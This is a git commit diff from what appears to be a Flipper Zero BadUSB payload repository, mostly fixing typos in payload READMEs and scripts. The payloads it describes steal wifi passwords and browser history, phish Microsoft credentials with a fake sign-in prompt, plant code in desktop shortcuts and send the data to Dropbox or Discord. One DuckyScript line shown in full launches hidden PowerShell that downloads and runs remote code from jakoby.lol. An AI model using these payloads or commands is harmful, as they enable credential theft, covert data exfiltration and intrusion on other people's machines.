Merge pull request #39 from Kavitate/main

Various Updates
This commit is contained in:
I-Am-Jakoby 2022-12-25 10:57:58 -06:00 committed by GitHub
commit 5d0fd64f70
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
39 changed files with 99 additions and 99 deletions

View file

@ -19,13 +19,13 @@
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data
This is an advanced recon of a target PC and exfiltration of that data.
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
All of the gather information is formatted neatly and output to a file
That file is then exfiltrated to cloud storage via DropBox
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
All of the gather information is formatted neatly and output to a file.
That file is then exfiltrated to cloud storage via Dropbox.
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
#>

View file

@ -2,7 +2,7 @@ REM Title: ADV-Recon
REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
REM Target: Windows 10, 11
@ -10,4 +10,3 @@ GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
ENTER

View file

@ -15,7 +15,7 @@
# ADV-Recon
A script used to do an advanced level of Recon on the targets computer.
A script used to do an advanced level of recon on the target's computer.
Version 2 no longer requires you to host your own version of the script.
@ -25,11 +25,11 @@ Modifying the execution script is the only necessary interaction.
This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
* Hosts Powershell Version (to know what commands can be run)
* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected)
* Hosts PowerShell Version (to know what commands can be run)
* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
* Whether they are in the Admin group or not
* The email associated with their Microsoft Account (for phishing possibilities)
* Other User accounts on their system (for possible privledge escalation)
* The email associated with their Microsoft account (for phishing possibilities)
* Other User accounts on their system (for possible privilege escalation)
* Details on their login settings (Ex: Min/Max password age and length)
* How many days since they have changed their password (Max password age - Days since = Opportunity)
* Their GeoLocation (know their approximate where abouts)
@ -39,7 +39,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
* Network Interfaces (What are they connecting in and out with)
* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
* Local Users (Accounts on system with Username, name associated with microsoft account and SID)
* Information on their HardDrives (Indicator of Recon Scope)
* Information on their hard drives (Indicator of Recon Scope)
* COM and Serial Devices (Is there a device connected you can manipulate?)
* Active TCP Connections (Poor mans Port Scanning)
* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
@ -50,7 +50,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
### Dependencies
* DropBox or Discord
* Dropbox or Discord
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>

View file

@ -2,8 +2,8 @@ REM Title: ADV-RickRoll
REM Author: I am Jakoby
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
REM Upon deployment payload will pause until a mouse movement is detected and run once one is.
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume.
REM Upon deployment, payload will pause until a mouse movement is detected and run once one is.
REM Target: Windows 10, 11

View file

@ -23,7 +23,7 @@
# ADV-RickRoll
A script used to do an advanced rick roll on your target
A script used to do an advanced rick roll on your target.
## Description

View file

@ -15,17 +15,17 @@
# Acid Burn
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
It determines the last day they changed their password and how many days ago.
Once the information is gathered, the script will pause until a mouse movement is detected.
Then, the script uses Sapi speak to roast their set up and lack of security.
If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.
The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.
## Getting Started

View file

@ -22,9 +22,9 @@
## Description
This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently)
This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
They are then exfiled using either discord or dropbox
They are then exfiled using either Discord or Dropbox.
## The Function

View file

@ -2,7 +2,7 @@ REM Title: Browser-Data
REM Author: I am Jakoby
REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, and Firefox
REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.
REM Target: Windows 10, 11

View file

@ -2,7 +2,9 @@ REM Title: Credz-Plz
REM Author: I am Jakoby
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
REM See README.md file for more details.
REM Target: Windows 10, 11

View file

@ -25,7 +25,7 @@
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your dropbox for collection
Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
.Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads

View file

@ -15,18 +15,18 @@
# Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
## Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account".
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up.
Once the target enters their credentials their information will be uploaded to your dropbox for collection.
Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection.
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
![alt text](https://i.imgur.com/mudQcIh.png)
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
![alt text](https://i.imgur.com/3JqE7a8.png)
## Getting Started

Binary file not shown.

After

Width:  |  Height:  |  Size: 140 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 73 KiB

After

Width:  |  Height:  |  Size: 184 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 39 KiB

View file

@ -23,7 +23,7 @@
# JumpScare 2.0
A script used to jumpscare your target
A script used to jumpscare your target.
## Description
@ -31,7 +31,7 @@ This script will jumpscare your target.
A jumpscare video will be downloaded to their temp directory.
When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen.
When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen.
## Getting Started

View file

@ -15,7 +15,7 @@
# JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description

View file

@ -23,7 +23,7 @@
# Must Sub
A script used to get your target to subscribe to 15 of my favorite hacker youtube channels
A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels.
## Description

View file

@ -15,20 +15,20 @@
# PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims.
## Description
These two programs use two different method to draw out images in the Powershell Window.
These two programs use two different methods to draw out images in the PowerShell window.
PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors,
then draw your image out in the powershell window. This process is not exact and needs testing of multiple images to find one that works well.
then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the
UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the powershell window.
UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window.
## Getting Started

View file

@ -15,13 +15,13 @@
# PineApple
A script used to connect a targets PC to your wifi PineApple
A script used to connect a targets PC to your Wifi PineApple.
## Description
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
The XML file will be manually entered into a Powershell window.
The Powershell window and run box will be erased for a clean exit.
The XML file will be manually entered into a PowerShell window.
The PowerShell window and run box will be erased for a clean exit.
## Getting Started

View file

@ -15,14 +15,14 @@
# Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected
A script used to download a WAV file and play it after a mouse movement is detected.
## Description
This program starts off by using an Invoke-WebRequest to download a WAV file.
The system volume is then turned up to the max level.
Then the script will be paused until a mouse movement is detected.
After one is the WAV file will be played.
After a mouse movement is detected, the WAV file will be played.
## Getting Started
@ -34,7 +34,7 @@ After one is the WAV file will be played.
### Executing program
* Place the WAV Url in the $wav variable
* Place the WAV URL in the $wav variable
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file

View file

@ -15,11 +15,11 @@
# Rage-PopUps
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
This program will open a series of pop-up boxes with insults in a loop that repeats as many times as you set it to.
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided.
## Getting Started

View file

@ -19,10 +19,10 @@
<#
.SYNOPSIS
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.
.DESCRIPTION
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up
for each one of them.
#>

View file

@ -30,23 +30,23 @@
<br>YouTube Tutorial
</p>
A script used to embed malware in the shortcut on your targets desktop
A script used to embed malware in the shortcut on your target's desktop.
## Description
This payload will run a powershell script in the background of any shortcut used on the targets desktop.
This payload will run a PowerShell script in the background of any shortcut used on the target's desktop.
This is done by taking advantage of the `Target` field where powershell commands can be stored or run.
This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run.
So if your command exceeds that consider using an IWR function to download and execute a longer script.
So if your command exceeds that, consider using an IWR function to download and execute a longer script.
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored.
---------------------------------------------------------------------------------------------------------------------------------------------------------
@ -60,7 +60,7 @@ Using the `Get-Shortcut` function we will get the following information we can t
## Getting Started
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file
### Dependencies

View file

@ -19,12 +19,12 @@
<#
.SYNOPSIS
This is payload used to inject powershell code into shortcuts
This is payload used to inject PowerShell code into shortcuts.
.DESCRIPTION
This payload will gather information on the shortcuts on your targets desktop
That data will then be manipulated to embed a powershell script
This script will be ran in the background when the short cut is
This payload will gather information on the shortcuts on your targets desktop.
That data will then be manipulated to embed a PowerShell script.
This script will be ran in the background when the short cut is.
#>
@ -32,7 +32,7 @@
<#
.NOTES
The powershell code stored in this variable is what will run in the background
The PowerShell code stored in this variable is what will run in the background.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
variable and it will still run.
#>

View file

@ -15,11 +15,11 @@
# Subscribe
A script I put together to make your target subscribe to your youtube channel
A script I put together to make your target subscribe to your YouTube channel.
## Description
This script is set to open your youtube account in their browser where they will be prompted to subscribe to you.
This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you.
SPOILER: They do.
## Getting Started
@ -27,7 +27,7 @@ SPOILER: They do.
### Dependencies
* Windows 10,11
* Your target will have to be signed into their youtube account
* Your target will have to be signed into their YouTube account
<p align="right">(<a href="#top">back to top</a>)</p>

View file

@ -19,11 +19,11 @@
<#
.DESCRIPTION
This program is designed to get your target to subscribe to your youtube channel
This program is designed to get your target to subscribe to your YouTube channel.
#>
#############################################################################################################################################
# Enter your youtube channel URL here, ONLY if you are rehosting this script yourself
# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
# $channel = "https://www.youtube.com/iamjakoby"

View file

@ -2,7 +2,7 @@ REM Title: Subscribe
REM Author: I am Jakoby
REM Description: This payload is meant to make your target subscribe to your youtube channel
REM Description: This payload is meant to make your target subscribe to your YouTube channel
REM Target: Windows 10, 11

View file

@ -15,13 +15,13 @@
# Wallpaper-URL
This payload will download an image from any URL and set it as the targets wallpaper
This payload will download an image from any URL and set it as the target's wallpaper.
## Description
Use this program to troll your friends. Find any image online and grab the url and insert it into the PS1 script.
Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script.
Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes.
Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the powershell and run box history will be wiped
Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped.
## Getting Started

View file

@ -15,7 +15,7 @@
# Wallpaper-Troll
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description

View file

@ -21,10 +21,10 @@
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
Public IP, the SSID, and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show.
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.
Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.
#>
#############################################################################################################################################

View file

@ -2,11 +2,11 @@ REM Title: Wallpaper-Troll
REM
REM Author: I am Jakoby
REM
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
REM
REM Target: Windows 10, 11
REM
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM
REM --------------------------------------------------------------------------------------

View file

@ -2,7 +2,7 @@ REM Title: We-Found-You
REM Author: I am Jakoby
REM Description: This payload is meant to open a map in your targets web browser with their current location
REM Description: This payload is meant to open a map in your target's web browser with their current location.
REM Target: Windows 10, 11

View file

@ -19,17 +19,17 @@
<#
.NOTES
The targets Location Services must be turned on or this payload will not work
The target's Location Services must be turned on or this payload will not work.
.SYNOPSIS
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed their password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
Once the information is gathered, the script will pause until a mouse movement is detected.
Then the script uses Sapi speak to roast their set up and lack of security.
#>
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
@ -37,7 +37,7 @@
<#
.NOTES
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
#>
function Get-fullName {

View file

@ -17,7 +17,7 @@
## Description
This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
## Getting Started
@ -30,9 +30,9 @@ This payload grabs your targets wifi passwords and uploads them to either Dropbo
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
`$dc` is the variable that stores your discord webhook
`$dc` is the variable that stores your Discord webhook
`$db` is the variable that stores your dropbox token
`$db` is the variable that stores your Dropbox token
Fill in either or both of these to methods to exfil your collected data

View file

@ -7,7 +7,7 @@ $wifiProfiles > $env:TEMP/--wifi-pass.txt
############################################################################################################################################################
# Upload output file to dropbox
# Upload output file to Dropbox
function DropBox-Upload {

View file

@ -2,7 +2,7 @@ REM Title: Wifi Grabber
REM Author: I am Jakoby
REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
REM Target: Windows 10, 11

View file

@ -23,14 +23,14 @@
# YouTube Tripwire
Plays any YouTube video after a mouse movement is detected
Plays any YouTube video after a mouse movement is detected.
## Description
This script is a one liner that can fit in the runbox by itself.
Just replace the URL for the Youtube video and run it.
Just replace the URL for the YouTube video and run it.
You can now unplug your device and walk away.
When your target returns and moves their mouse the video will start playing full screen.
When your target returns and moves their mouse, the video will start playing full screen.
## Getting Started

View file

@ -1,7 +1,6 @@
REM Title: YouTube-TripWire
REM Author: I am Jakoby
REM Description: Plays any YouTube video after a mouse movement is detected
REM Replace URL with your own
REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)
REM Target: Windows 10, 11
GUI r
DELAY 500

View file

@ -2,7 +2,7 @@
# 🐬 Flipper-Zero-BadUSB 🐬
If you would like to support the work that I do please consider becoming a subscriber in our Discord
If you would like to support the work that I do, please consider becoming a subscriber in our Discord.
[SUBSCRIBE](https://jakoby.lol/tah)
@ -53,9 +53,9 @@ Subscribing to my YouTube would also be really appreciated.
This repository has been optimized to facilitate plug and play functionality.
I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs
I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs.
I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners
I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners.
This in turn makes it so the user no longer has to host their own version of the script.